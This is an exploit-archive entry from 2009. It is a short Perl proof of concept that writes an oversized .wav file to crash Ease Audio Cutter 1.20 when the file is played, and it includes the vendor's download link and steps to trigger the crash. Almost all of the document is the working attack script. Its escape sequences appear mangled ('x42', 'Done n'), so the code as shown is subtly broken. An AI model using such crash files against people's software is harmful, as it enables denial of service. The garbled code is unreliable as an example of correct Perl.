[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Ease Audio Cutter 1.20 (.wav file) Local Crash PoC
# Published : 2009-09-17
# Author : zAx
# Previous Title : Xerver HTTP Server <= v4.32 Remote Denial of Service
# Next Title : BigAnt Server 2.50 SP1 (ZIP File) Local Buffer Overflow PoC
#!/usr/bin/perl
###########################################################################
# Ease Audio Cutter 1.20 (.wav file) Local Crash PoC #
# By : zAx #
###########################################################################
# Application Homepage : http://mp3-cutter.com #
# Application Download : http://mp3-cutter.com/download/audiocutter.exe #
# Description : Click Select file button, select our file and click Play #
###########################################################################
$crash = "x42" x 15000;
my $file = "zAx_Crash.wav";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $crash;
close($FILE);
print "Done n";
# www.Syue.com [2009-09-17]